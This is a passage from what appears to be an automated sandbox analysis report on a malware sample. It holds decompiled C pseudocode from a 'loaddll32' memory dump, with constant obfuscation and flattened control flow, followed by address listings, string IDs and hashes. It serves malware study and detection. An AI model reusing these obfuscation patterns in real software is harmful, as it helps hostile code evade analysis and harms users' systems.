                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                            				signed int _v160;
                                                                                                                                                                            				signed int _v164;
                                                                                                                                                                            				signed int _v168;
                                                                                                                                                                            				signed int _v172;
                                                                                                                                                                            				signed int _v176;
                                                                                                                                                                            				signed int _v180;
                                                                                                                                                                            				signed int _v184;
                                                                                                                                                                            				signed int _v188;
                                                                                                                                                                            				signed int _v192;
                                                                                                                                                                            				signed int _v196;
                                                                                                                                                                            				char _t272;
                                                                                                                                                                            				void* _t295;
                                                                                                                                                                            				signed int _t305;
                                                                                                                                                                            				signed int _t306;
                                                                                                                                                                            				signed int _t307;
                                                                                                                                                                            				signed int _t308;
                                                                                                                                                                            				signed int _t309;
                                                                                                                                                                            				void* _t312;
                                                                                                                                                                            				void* _t334;
                                                                                                                                                                            				intOrPtr _t335;
                                                                                                                                                                            				signed int* _t338;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a32);
                                                                                                                                                                            				_t334 = __ecx;
                                                                                                                                                                            				_push(_a28);
                                                                                                                                                                            				_push(_a24);
                                                                                                                                                                            				_push(_a20);
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				_t272 = E02F6FE29(0);
                                                                                                                                                                            				_v84 = _t272;
                                                                                                                                                                            				_t338 =  &(( &_v196)[0xa]);
                                                                                                                                                                            				_v72 = _t272;
                                                                                                                                                                            				_t335 = _t272;
                                                                                                                                                                            				_v80 = 0x49e87b;
                                                                                                                                                                            				_v76 = 0xc5c8e1;
                                                                                                                                                                            				_t312 = 0x7956bd9;
                                                                                                                                                                            				_v96 = 0x2d2511;
                                                                                                                                                                            				_t305 = 0x6f;
                                                                                                                                                                            				_v96 = _v96 / _t305;
                                                                                                                                                                            				_v96 = _v96 ^ 0x00006c1e;
                                                                                                                                                                            				_v192 = 0x2be237;
                                                                                                                                                                            				_t22 =  &_v192; // 0x2be237
                                                                                                                                                                            				_t306 = 0x35;
                                                                                                                                                                            				_v192 =  *_t22 * 0x2a;
                                                                                                                                                                            				_v192 = _v192 ^ 0x8f196f07;
                                                                                                                                                                            				_v192 = _v192 ^ 0x2da4b7e5;
                                                                                                                                                                            				_v192 = _v192 ^ 0xa58ec5c4;
                                                                                                                                                                            				_v172 = 0x207d98;
                                                                                                                                                                            				_v172 = _v172 ^ 0x972b32db;
                                                                                                                                                                            				_v172 = _v172 | 0x9c7c4c28;
                                                                                                                                                                            				_v172 = _v172 * 0x48;
                                                                                                                                                                            				_v172 = _v172 ^ 0xdbcfdb8a;
                                                                                                                                                                            				_v100 = 0x57c7e;
                                                                                                                                                                            				_v100 = _v100 + 0xffffdd89;
                                                                                                                                                                            				_v100 = _v100 ^ 0x000aed2d;
                                                                                                                                                                            				_v124 = 0x64cad1;
                                                                                                                                                                            				_v124 = _v124 + 0xffff2d5b;
                                                                                                                                                                            				_v124 = _v124 << 4;
                                                                                                                                                                            				_v124 = _v124 ^ 0x063cb223;
                                                                                                                                                                            				_v148 = 0xd38c19;
                                                                                                                                                                            				_v148 = _v148 >> 7;
                                                                                                                                                                            				_v148 = _v148 >> 0xf;
                                                                                                                                                                            				_v148 = _v148 ^ 0x0008e1ac;
                                                                                                                                                                            				_v88 = 0xe6598d;
                                                                                                                                                                            				_v88 = _v88 ^ 0xb40d33dc;
                                                                                                                                                                            				_v88 = _v88 ^ 0xb4eaaa1c;
                                                                                                                                                                            				_v92 = 0x85b818;
                                                                                                                                                                            				_v92 = _v92 + 0xffffc4c3;
                                                                                                                                                                            				_v92 = _v92 ^ 0x008e2283;
                                                                                                                                                                            				_v104 = 0x6cafca;
                                                                                                                                                                            				_v104 = _v104 * 0x73;
                                                                                                                                                                            				_v104 = _v104 ^ 0x30d8f33f;
                                                                                                                                                                            				_v120 = 0xea107;
                                                                                                                                                                            				_v120 = _v120 / _t306;
                                                                                                                                                                            				_v120 = _v120 ^ 0x000228b8;
                                                                                                                                                                            				_v112 = 0x4bcc54;
                                                                                                                                                                            				_v112 = _v112 * 0x3f;
                                                                                                                                                                            				_v112 = _v112 ^ 0x12af13c7;
                                                                                                                                                                            				_v176 = 0x25f352;
                                                                                                                                                                            				_v176 = _v176 * 0x1d;
                                                                                                                                                                            				_t307 = 0x55;
                                                                                                                                                                            				_v176 = _v176 / _t307;
                                                                                                                                                                            				_v176 = _v176 + 0xa166;
                                                                                                                                                                            				_v176 = _v176 ^ 0x00018b34;
                                                                                                                                                                            				_v168 = 0x70163a;
                                                                                                                                                                            				_v168 = _v168 | 0xb665b778;
                                                                                                                                                                            				_v168 = _v168 + 0xffff15cb;
                                                                                                                                                                            				_v168 = _v168 + 0xffff931b;
                                                                                                                                                                            				_v168 = _v168 ^ 0xb6787764;
                                                                                                                                                                            				_v184 = 0xfb3451;
                                                                                                                                                                            				_t308 = 0x2f;
                                                                                                                                                                            				_v184 = _v184 * 0x55;
                                                                                                                                                                            				_v184 = _v184 + 0xffff75a5;
                                                                                                                                                                            				_v184 = _v184 * 0x5c;
                                                                                                                                                                            				_v184 = _v184 ^ 0xf953722f;
                                                                                                                                                                            				_v160 = 0x3448db;
                                                                                                                                                                            				_v160 = _v160 | 0x0a9a3806;
                                                                                                                                                                            				_v160 = _v160 + 0xffffbb3e;
                                                                                                                                                                            				_v160 = _v160 << 6;
                                                                                                                                                                            				_v160 = _v160 ^ 0xaf82d104;
                                                                                                                                                                            				_v108 = 0x7f4bc6;
                                                                                                                                                                            				_v108 = _v108 * 0x47;
                                                                                                                                                                            				_v108 = _v108 ^ 0x234271fe;
                                                                                                                                                                            				_v116 = 0x137e80;
                                                                                                                                                                            				_v116 = _v116 << 7;
                                                                                                                                                                            				_v116 = _v116 ^ 0x09bed852;
                                                                                                                                                                            				_v140 = 0x58b738;
                                                                                                                                                                            				_v140 = _v140 >> 3;
                                                                                                                                                                            				_v140 = _v140 / _t308;
                                                                                                                                                                            				_v140 = _v140 ^ 0x0006291c;
                                                                                                                                                                            				_v152 = 0x1dae44;
                                                                                                                                                                            				_v152 = _v152 + 0xb010;
                                                                                                                                                                            				_t309 = 0x7a;
                                                                                                                                                                            				_v152 = _v152 / _t309;
                                                                                                                                                                            				_v152 = _v152 ^ 0x0004435a;
                                                                                                                                                                            				_v136 = 0x3e9c6a;
                                                                                                                                                                            				_v136 = _v136 + 0xffff4267;
                                                                                                                                                                            				_v136 = _v136 + 0xa013;
                                                                                                                                                                            				_v136 = _v136 ^ 0x00313444;
                                                                                                                                                                            				_v128 = 0xfc4661;
                                                                                                                                                                            				_v128 = _v128 ^ 0x84ef8931;
                                                                                                                                                                            				_v128 = _v128 >> 6;
                                                                                                                                                                            				_v128 = _v128 ^ 0x021c54a7;
                                                                                                                                                                            				_v144 = 0x2fd65c;
                                                                                                                                                                            				_v144 = _v144 | 0x65ad1a2d;
                                                                                                                                                                            				_v144 = _v144 ^ 0x87299bd7;
                                                                                                                                                                            				_v144 = _v144 ^ 0xe281bdf5;
                                                                                                                                                                            				_v180 = 0x40c6e5;
                                                                                                                                                                            				_v180 = _v180 + 0xffff5f75;
                                                                                                                                                                            				_v180 = _v180 + 0x6863;
                                                                                                                                                                            				_v180 = _v180 << 0xc;
                                                                                                                                                                            				_v180 = _v180 ^ 0x08e53add;
                                                                                                                                                                            				_v132 = 0x50fbcf;
                                                                                                                                                                            				_v132 = _v132 | 0xda091e24;
                                                                                                                                                                            				_v132 = _v132 + 0xffffc3f6;
                                                                                                                                                                            				_v132 = _v132 ^ 0xda5ae4d8;
                                                                                                                                                                            				_v188 = 0x29fd87;
                                                                                                                                                                            				_v188 = _v188 | 0x249d2c08;
                                                                                                                                                                            				_v188 = _v188 << 1;
                                                                                                                                                                            				_v188 = _v188 | 0xc4033418;
                                                                                                                                                                            				_v188 = _v188 ^ 0xcd7b5999;
                                                                                                                                                                            				_v196 = 0x78de76;
                                                                                                                                                                            				_v196 = _v196 * 0x7c;
                                                                                                                                                                            				_v196 = _v196 + 0xffff171c;
                                                                                                                                                                            				_v196 = _v196 >> 5;
                                                                                                                                                                            				_v196 = _v196 ^ 0x01d3afb7;
                                                                                                                                                                            				_v156 = 0x2e37f5;
                                                                                                                                                                            				_v156 = _v156 + 0xffff32dd;
                                                                                                                                                                            				_v156 = _v156 >> 1;
                                                                                                                                                                            				_v156 = _v156 * 0x73;
                                                                                                                                                                            				_v156 = _v156 ^ 0x0a367c41;
                                                                                                                                                                            				_v164 = 0x79bcb0;
                                                                                                                                                                            				_v164 = _v164 + 0x8106;
                                                                                                                                                                            				_v164 = _v164 + 0x4469;
                                                                                                                                                                            				_v164 = _v164 + 0xffff19e3;
                                                                                                                                                                            				_v164 = _v164 ^ 0x007fae8c;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t312 != 0x59e10b1) {
                                                                                                                                                                            						if(_t312 == 0x7956bd9) {
                                                                                                                                                                            							_t312 = 0x84e17ac;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t312 == 0x84e17ac) {
                                                                                                                                                                            								_t264 =  &_v84; // 0x49e87b
                                                                                                                                                                            								_t267 =  &_v172; // 0xa367c41
                                                                                                                                                                            								_t295 = E02F64178( *_t267, _v100, _t264, _a20, _v124);
                                                                                                                                                                            								_t338 =  &(_t338[4]);
                                                                                                                                                                            								__eflags = _t295;
                                                                                                                                                                            								if(_t295 != 0) {
                                                                                                                                                                            									_t312 = 0x9148c69;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t344 = _t312 - 0x9148c69;
                                                                                                                                                                            								if(_t312 != 0x9148c69) {
                                                                                                                                                                            									goto L10;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									E02F6FE2A(_v148, _v88, 0x44,  &_v68);
                                                                                                                                                                            									_push(_v112);
                                                                                                                                                                            									_v68 = 0x44;
                                                                                                                                                                            									_push(_v120);
                                                                                                                                                                            									_push(_v104);
                                                                                                                                                                            									_v60 = E02F6E1F8(0x2f51224, _v92, _t344);
                                                                                                                                                                            									_t335 = E02F5473D(_a20, _v176, _v168, 0x2f51224, 0x2f51224, _v184, _v160, 0, _a24, _v108, _t334, _v116, _v140, _v152, _v84, 0x2f51224, _v136, _v128, _v144, _v192 | _v96,  &_v68);
                                                                                                                                                                            									E02F6FECB(_v60, _v180, _v132, _v188, _v196);
                                                                                                                                                                            									_t338 =  &(_t338[0x1c]);
                                                                                                                                                                            									_t312 = 0x59e10b1;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L11;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t269 =  &_v84; // 0x49e87b
                                                                                                                                                                            					E02F67952(_v156,  *_t269, _v164);
                                                                                                                                                                            					_t312 = 0xf5fdc0f;
                                                                                                                                                                            					L10:
                                                                                                                                                                            					__eflags = _t312 - 0xf5fdc0f;
                                                                                                                                                                            				} while (_t312 != 0xf5fdc0f);
                                                                                                                                                                            				L11:
                                                                                                                                                                            				return _t335;
                                                                                                                                                                            			}
















































                                                                                                                                                                            0x02f60185
                                                                                                                                                                            0x02f6018e
                                                                                                                                                                            0x02f60190
                                                                                                                                                                            0x02f60197
                                                                                                                                                                            0x02f6019e
                                                                                                                                                                            0x02f601a5
                                                                                                                                                                            0x02f601ac
                                                                                                                                                                            0x02f601b3
                                                                                                                                                                            0x02f601b4
                                                                                                                                                                            0x02f601bb
                                                                                                                                                                            0x02f601bc
                                                                                                                                                                            0x02f601bd
                                                                                                                                                                            0x02f601c2
                                                                                                                                                                            0x02f601c9
                                                                                                                                                                            0x02f601cc
                                                                                                                                                                            0x02f601d3
                                                                                                                                                                            0x02f601d5
                                                                                                                                                                            0x02f601e2
                                                                                                                                                                            0x02f601ed
                                                                                                                                                                            0x02f601f2
                                                                                                                                                                            0x02f60200
                                                                                                                                                                            0x02f60205
                                                                                                                                                                            0x02f6020b
                                                                                                                                                                            0x02f60213
                                                                                                                                                                            0x02f6021b
                                                                                                                                                                            0x02f60220
                                                                                                                                                                            0x02f60221
                                                                                                                                                                            0x02f60225
                                                                                                                                                                            0x02f6022d
                                                                                                                                                                            0x02f60235
                                                                                                                                                                            0x02f6023d
                                                                                                                                                                            0x02f60245
                                                                                                                                                                            0x02f6024d
                                                                                                                                                                            0x02f6025a
                                                                                                                                                                            0x02f6025e
                                                                                                                                                                            0x02f60266
                                                                                                                                                                            0x02f6026e
                                                                                                                                                                            0x02f60276
                                                                                                                                                                            0x02f6027e
                                                                                                                                                                            0x02f60286
                                                                                                                                                                            0x02f6028e
                                                                                                                                                                            0x02f60293
                                                                                                                                                                            0x02f6029b
                                                                                                                                                                            0x02f602a3
                                                                                                                                                                            0x02f602a8
                                                                                                                                                                            0x02f602ad
                                                                                                                                                                            0x02f602b5
                                                                                                                                                                            0x02f602bd
                                                                                                                                                                            0x02f602c5
                                                                                                                                                                            0x02f602cd
                                                                                                                                                                            0x02f602d5
                                                                                                                                                                            0x02f602dd
                                                                                                                                                                            0x02f602e5
                                                                                                                                                                            0x02f602f2
                                                                                                                                                                            0x02f602f6
                                                                                                                                                                            0x02f602fe
                                                                                                                                                                            0x02f6030c
                                                                                                                                                                            0x02f60310
                                                                                                                                                                            0x02f60318
                                                                                                                                                                            0x02f60325
                                                                                                                                                                            0x02f60329
                                                                                                                                                                            0x02f60331
                                                                                                                                                                            0x02f6033e
                                                                                                                                                                            0x02f6034a
                                                                                                                                                                            0x02f6034f
                                                                                                                                                                            0x02f60355
                                                                                                                                                                            0x02f6035d
                                                                                                                                                                            0x02f60365
                                                                                                                                                                            0x02f6036d
                                                                                                                                                                            0x02f60375
                                                                                                                                                                            0x02f6037d
                                                                                                                                                                            0x02f60385
                                                                                                                                                                            0x02f6038d
                                                                                                                                                                            0x02f6039a
                                                                                                                                                                            0x02f6039d
                                                                                                                                                                            0x02f603a1
                                                                                                                                                                            0x02f603ae
                                                                                                                                                                            0x02f603b2
                                                                                                                                                                            0x02f603ba
                                                                                                                                                                            0x02f603c2
                                                                                                                                                                            0x02f603ca
                                                                                                                                                                            0x02f603d2
                                                                                                                                                                            0x02f603d7
                                                                                                                                                                            0x02f603df
                                                                                                                                                                            0x02f603ec
                                                                                                                                                                            0x02f603f0
                                                                                                                                                                            0x02f603f8
                                                                                                                                                                            0x02f60400
                                                                                                                                                                            0x02f60405
                                                                                                                                                                            0x02f6040d
                                                                                                                                                                            0x02f60415
                                                                                                                                                                            0x02f60422
                                                                                                                                                                            0x02f60426
                                                                                                                                                                            0x02f6042e
                                                                                                                                                                            0x02f60436
                                                                                                                                                                            0x02f60442
                                                                                                                                                                            0x02f60445
                                                                                                                                                                            0x02f60449
                                                                                                                                                                            0x02f60451
                                                                                                                                                                            0x02f60459
                                                                                                                                                                            0x02f60461
                                                                                                                                                                            0x02f60469
                                                                                                                                                                            0x02f60471
                                                                                                                                                                            0x02f60479
                                                                                                                                                                            0x02f60481
                                                                                                                                                                            0x02f60486
                                                                                                                                                                            0x02f6048e
                                                                                                                                                                            0x02f60496
                                                                                                                                                                            0x02f6049e
                                                                                                                                                                            0x02f604a6
                                                                                                                                                                            0x02f604ae
                                                                                                                                                                            0x02f604b6
                                                                                                                                                                            0x02f604be
                                                                                                                                                                            0x02f604c6
                                                                                                                                                                            0x02f604cb
                                                                                                                                                                            0x02f604d3
                                                                                                                                                                            0x02f604db
                                                                                                                                                                            0x02f604e3
                                                                                                                                                                            0x02f604eb
                                                                                                                                                                            0x02f604f3
                                                                                                                                                                            0x02f604fb
                                                                                                                                                                            0x02f60503
                                                                                                                                                                            0x02f60507
                                                                                                                                                                            0x02f6050f
                                                                                                                                                                            0x02f60517
                                                                                                                                                                            0x02f60524
                                                                                                                                                                            0x02f60528
                                                                                                                                                                            0x02f60530
                                                                                                                                                                            0x02f60535
                                                                                                                                                                            0x02f6053d
                                                                                                                                                                            0x02f6054a
                                                                                                                                                                            0x02f60557
                                                                                                                                                                            0x02f60560
                                                                                                                                                                            0x02f60564
                                                                                                                                                                            0x02f6056c
                                                                                                                                                                            0x02f60574
                                                                                                                                                                            0x02f6057c
                                                                                                                                                                            0x02f60584
                                                                                                                                                                            0x02f6058c
                                                                                                                                                                            0x02f60594
                                                                                                                                                                            0x02f60594
                                                                                                                                                                            0x02f605a6
                                                                                                                                                                            0x02f606c4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f605ac
                                                                                                                                                                            0x02f605ae
                                                                                                                                                                            0x02f6069a
                                                                                                                                                                            0x02f606ad
                                                                                                                                                                            0x02f606b1
                                                                                                                                                                            0x02f606b6
                                                                                                                                                                            0x02f606b9
                                                                                                                                                                            0x02f606bb
                                                                                                                                                                            0x02f606bd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f606bd
                                                                                                                                                                            0x02f605b4
                                                                                                                                                                            0x02f605b4
                                                                                                                                                                            0x02f605b6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f605bc
                                                                                                                                                                            0x02f605ce
                                                                                                                                                                            0x02f605d3
                                                                                                                                                                            0x02f605dc
                                                                                                                                                                            0x02f605e7
                                                                                                                                                                            0x02f605eb
                                                                                                                                                                            0x02f605fe
                                                                                                                                                                            0x02f6066c
                                                                                                                                                                            0x02f60684
                                                                                                                                                                            0x02f60689
                                                                                                                                                                            0x02f6068c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6068c
                                                                                                                                                                            0x02f605b6
                                                                                                                                                                            0x02f605ae
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f605a6
                                                                                                                                                                            0x02f606cf
                                                                                                                                                                            0x02f606da
                                                                                                                                                                            0x02f606e0
                                                                                                                                                                            0x02f606e5
                                                                                                                                                                            0x02f606e5
                                                                                                                                                                            0x02f606e5
                                                                                                                                                                            0x02f606f2
                                                                                                                                                                            0x02f606fd

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: -$7+$A|6$D$D41$ch$iD${I
                                                                                                                                                                            • API String ID: 0-1622838380
                                                                                                                                                                            • Opcode ID: 95c3d79d58a326e06de880a79d5272edd210aeb39973456475e532edff1672de
                                                                                                                                                                            • Instruction ID: 186ab226c33a606eb2026fd9b93f4777bf0ca9f42886dd1b35278703f5b0c9d8
                                                                                                                                                                            • Opcode Fuzzy Hash: 95c3d79d58a326e06de880a79d5272edd210aeb39973456475e532edff1672de
                                                                                                                                                                            • Instruction Fuzzy Hash: 2FD1EEB25083819FD368CF61C889A1BFBE1FBD5358F508A1DF69996260D7B58948CF02
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                            			E02F627F9() {
                                                                                                                                                                            				char _v520;
                                                                                                                                                                            				char _v1040;
                                                                                                                                                                            				signed int _v1044;
                                                                                                                                                                            				signed int _v1048;
                                                                                                                                                                            				signed int _v1052;
                                                                                                                                                                            				signed int _v1056;
                                                                                                                                                                            				signed int _v1060;
                                                                                                                                                                            				signed int _v1064;
                                                                                                                                                                            				signed int _v1068;
                                                                                                                                                                            				signed int _v1072;
                                                                                                                                                                            				signed int _v1076;
                                                                                                                                                                            				signed int _v1080;
                                                                                                                                                                            				signed int _v1084;
                                                                                                                                                                            				signed int _v1088;
                                                                                                                                                                            				signed int _v1092;
                                                                                                                                                                            				signed int _v1096;
                                                                                                                                                                            				signed int _v1100;
                                                                                                                                                                            				signed int _v1104;
                                                                                                                                                                            				signed int _v1108;
                                                                                                                                                                            				signed int _v1112;
                                                                                                                                                                            				signed int _v1116;
                                                                                                                                                                            				signed int _v1120;
                                                                                                                                                                            				signed int _v1124;
                                                                                                                                                                            				signed int _v1128;
                                                                                                                                                                            				signed int _v1132;
                                                                                                                                                                            				signed int _v1136;
                                                                                                                                                                            				signed int _v1140;
                                                                                                                                                                            				signed int _v1144;
                                                                                                                                                                            				short* _t249;
                                                                                                                                                                            				void* _t251;
                                                                                                                                                                            				intOrPtr _t253;
                                                                                                                                                                            				intOrPtr _t257;
                                                                                                                                                                            				void* _t260;
                                                                                                                                                                            				intOrPtr _t267;
                                                                                                                                                                            				signed int _t288;
                                                                                                                                                                            				signed int _t289;
                                                                                                                                                                            				signed int _t290;
                                                                                                                                                                            				signed int _t291;
                                                                                                                                                                            				signed int* _t294;
                                                                                                                                                                            
                                                                                                                                                                            				_t294 =  &_v1144;
                                                                                                                                                                            				_v1076 = 0xe2454d;
                                                                                                                                                                            				_v1076 = _v1076 << 0xe;
                                                                                                                                                                            				_t260 = 0xa27996a;
                                                                                                                                                                            				_v1076 = _v1076 ^ 0x9150c829;
                                                                                                                                                                            				_v1116 = 0xb7d7ba;
                                                                                                                                                                            				_v1116 = _v1116 >> 3;
                                                                                                                                                                            				_v1116 = _v1116 * 0x45;
                                                                                                                                                                            				_v1116 = _v1116 ^ 0x0637cdcd;
                                                                                                                                                                            				_v1064 = 0x633f3;
                                                                                                                                                                            				_t288 = 7;
                                                                                                                                                                            				_v1064 = _v1064 / _t288;
                                                                                                                                                                            				_v1064 = _v1064 ^ 0x000e68da;
                                                                                                                                                                            				_v1044 = 0x68e137;
                                                                                                                                                                            				_v1044 = _v1044 >> 8;
                                                                                                                                                                            				_v1044 = _v1044 ^ 0x000f94d8;
                                                                                                                                                                            				_v1104 = 0x560a82;
                                                                                                                                                                            				_t289 = 0x4d;
                                                                                                                                                                            				_v1104 = _v1104 * 0x12;
                                                                                                                                                                            				_v1104 = _v1104 << 0xa;
                                                                                                                                                                            				_v1104 = _v1104 ^ 0x32f73e43;
                                                                                                                                                                            				_v1128 = 0x20b49c;
                                                                                                                                                                            				_v1128 = _v1128 + 0xffff9350;
                                                                                                                                                                            				_v1128 = _v1128 / _t289;
                                                                                                                                                                            				_v1128 = _v1128 + 0xffff69f1;
                                                                                                                                                                            				_v1128 = _v1128 ^ 0xfff8ef71;
                                                                                                                                                                            				_v1144 = 0xda057e;
                                                                                                                                                                            				_v1144 = _v1144 | 0x61d5fb11;
                                                                                                                                                                            				_v1144 = _v1144 + 0x9b0d;
                                                                                                                                                                            				_t290 = 0x47;
                                                                                                                                                                            				_v1144 = _v1144 / _t290;
                                                                                                                                                                            				_v1144 = _v1144 ^ 0x016fc7d6;
                                                                                                                                                                            				_v1108 = 0xd954d9;
                                                                                                                                                                            				_v1108 = _v1108 >> 3;
                                                                                                                                                                            				_v1108 = _v1108 * 0x2a;
                                                                                                                                                                            				_v1108 = _v1108 ^ 0x047d2f3f;
                                                                                                                                                                            				_v1084 = 0xee9532;
                                                                                                                                                                            				_v1084 = _v1084 | 0x01e1ea12;
                                                                                                                                                                            				_v1084 = _v1084 * 0x5e;
                                                                                                                                                                            				_v1084 = _v1084 ^ 0xb61982a0;
                                                                                                                                                                            				_v1136 = 0x9da312;
                                                                                                                                                                            				_v1136 = _v1136 * 0xb;
                                                                                                                                                                            				_v1136 = _v1136 + 0xfaec;
                                                                                                                                                                            				_v1136 = _v1136 << 4;
                                                                                                                                                                            				_v1136 = _v1136 ^ 0x6c675c41;
                                                                                                                                                                            				_v1048 = 0x5b4722;
                                                                                                                                                                            				_v1048 = _v1048 + 0x58c6;
                                                                                                                                                                            				_v1048 = _v1048 ^ 0x0051fe1e;
                                                                                                                                                                            				_v1140 = 0xb81c47;
                                                                                                                                                                            				_v1140 = _v1140 | 0xf47f3da9;
                                                                                                                                                                            				_v1140 = _v1140 + 0xffffb1b6;
                                                                                                                                                                            				_v1140 = _v1140 * 0x52;
                                                                                                                                                                            				_v1140 = _v1140 ^ 0x79a8ba01;
                                                                                                                                                                            				_v1100 = 0x4ec91e;
                                                                                                                                                                            				_v1100 = _v1100 + 0xffff658a;
                                                                                                                                                                            				_v1100 = _v1100 + 0xa7da;
                                                                                                                                                                            				_v1100 = _v1100 ^ 0x004d9e7a;
                                                                                                                                                                            				_v1056 = 0xd22e34;
                                                                                                                                                                            				_v1056 = _v1056 * 0x39;
                                                                                                                                                                            				_v1056 = _v1056 ^ 0x2eccf222;
                                                                                                                                                                            				_v1092 = 0x4415ff;
                                                                                                                                                                            				_v1092 = _v1092 << 0xc;
                                                                                                                                                                            				_v1092 = _v1092 + 0xffffcb4f;
                                                                                                                                                                            				_v1092 = _v1092 ^ 0x4156ca29;
                                                                                                                                                                            				_v1112 = 0xebdea7;
                                                                                                                                                                            				_v1112 = _v1112 + 0xffff30b5;
                                                                                                                                                                            				_v1112 = _v1112 ^ 0x44658fef;
                                                                                                                                                                            				_v1112 = _v1112 ^ 0x4481ff75;
                                                                                                                                                                            				_v1132 = 0x210e2f;
                                                                                                                                                                            				_v1132 = _v1132 + 0x4766;
                                                                                                                                                                            				_v1132 = _v1132 >> 6;
                                                                                                                                                                            				_t291 = 0x78;
                                                                                                                                                                            				_v1132 = _v1132 / _t291;
                                                                                                                                                                            				_v1132 = _v1132 ^ 0x000739d3;
                                                                                                                                                                            				_v1072 = 0xec15b6;
                                                                                                                                                                            				_v1072 = _v1072 + 0xf74;
                                                                                                                                                                            				_v1072 = _v1072 ^ 0x00e11cf3;
                                                                                                                                                                            				_v1096 = 0xda8ada;
                                                                                                                                                                            				_v1096 = _v1096 >> 0xe;
                                                                                                                                                                            				_v1096 = _v1096 * 0x4f;
                                                                                                                                                                            				_v1096 = _v1096 ^ 0x00036eb4;
                                                                                                                                                                            				_v1120 = 0x69db3;
                                                                                                                                                                            				_v1120 = _v1120 + 0x311c;
                                                                                                                                                                            				_v1120 = _v1120 << 2;
                                                                                                                                                                            				_v1120 = _v1120 ^ 0x00187b2b;
                                                                                                                                                                            				_v1068 = 0x7459e2;
                                                                                                                                                                            				_v1068 = _v1068 >> 8;
                                                                                                                                                                            				_v1068 = _v1068 ^ 0x000d8df4;
                                                                                                                                                                            				_v1060 = 0x7a5957;
                                                                                                                                                                            				_v1060 = _v1060 + 0x9cd0;
                                                                                                                                                                            				_v1060 = _v1060 ^ 0x007b6b01;
                                                                                                                                                                            				_v1088 = 0xc3c012;
                                                                                                                                                                            				_v1088 = _v1088 >> 0x10;
                                                                                                                                                                            				_v1088 = _v1088 << 5;
                                                                                                                                                                            				_v1088 = _v1088 ^ 0x00089583;
                                                                                                                                                                            				_v1124 = 0x7ac281;
                                                                                                                                                                            				_v1124 = _v1124 >> 0xa;
                                                                                                                                                                            				_v1124 = _v1124 >> 0xf;
                                                                                                                                                                            				_v1124 = _v1124 + 0xc97f;
                                                                                                                                                                            				_v1124 = _v1124 ^ 0x00055573;
                                                                                                                                                                            				_v1052 = 0x890174;
                                                                                                                                                                            				_v1052 = _v1052 + 0xa006;
                                                                                                                                                                            				_v1052 = _v1052 ^ 0x008bc550;
                                                                                                                                                                            				_v1080 = 0xeb1cb6;
                                                                                                                                                                            				_v1080 = _v1080 ^ 0x4b3beb78;
                                                                                                                                                                            				_v1080 = _v1080 >> 0x10;
                                                                                                                                                                            				_v1080 = _v1080 ^ 0x00025049;
                                                                                                                                                                            				while(_t260 != 0x3b56309) {
                                                                                                                                                                            					if(_t260 == 0x7219719) {
                                                                                                                                                                            						E02F6DC71();
                                                                                                                                                                            						L8:
                                                                                                                                                                            						_t260 = 0x9bc0f5a;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t260 == 0x9631a61) {
                                                                                                                                                                            						_t249 = E02F609DD(_v1060,  &_v1040, _v1088, _v1124);
                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                            						 *_t249 = 0;
                                                                                                                                                                            						return E02F5856E( &_v1040, _v1052, _v1080);
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t260 == 0x9bc0f5a) {
                                                                                                                                                                            						_push(_v1128);
                                                                                                                                                                            						_push(_v1104);
                                                                                                                                                                            						_push(_v1044);
                                                                                                                                                                            						_t251 = E02F6E1F8(0x2f51000, _v1064, __eflags);
                                                                                                                                                                            						_t267 =  *0x2f76214; // 0x0
                                                                                                                                                                            						_t253 =  *0x2f76214; // 0x0
                                                                                                                                                                            						E02F72D0A(_v1108, __eflags, _t253 + 0x23c, _v1084, _v1136, _v1048, _t267 + 0x34,  &_v1040, _t267 + 0x34, _t251);
                                                                                                                                                                            						E02F6FECB(_t251, _v1140, _v1100, _v1056, _v1092);
                                                                                                                                                                            						_t294 =  &(_t294[0xe]);
                                                                                                                                                                            						_t260 = 0x3b56309;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t260 == 0xa27996a) {
                                                                                                                                                                            						_t257 =  *0x2f76214; // 0x0
                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t257 + 0x20));
                                                                                                                                                                            						_t260 =  !=  ? 0xb537953 : 0x7219719;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t260 != 0xb537953) {
                                                                                                                                                                            						L13:
                                                                                                                                                                            						__eflags = _t260 - 0xf6a818b;
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							continue;
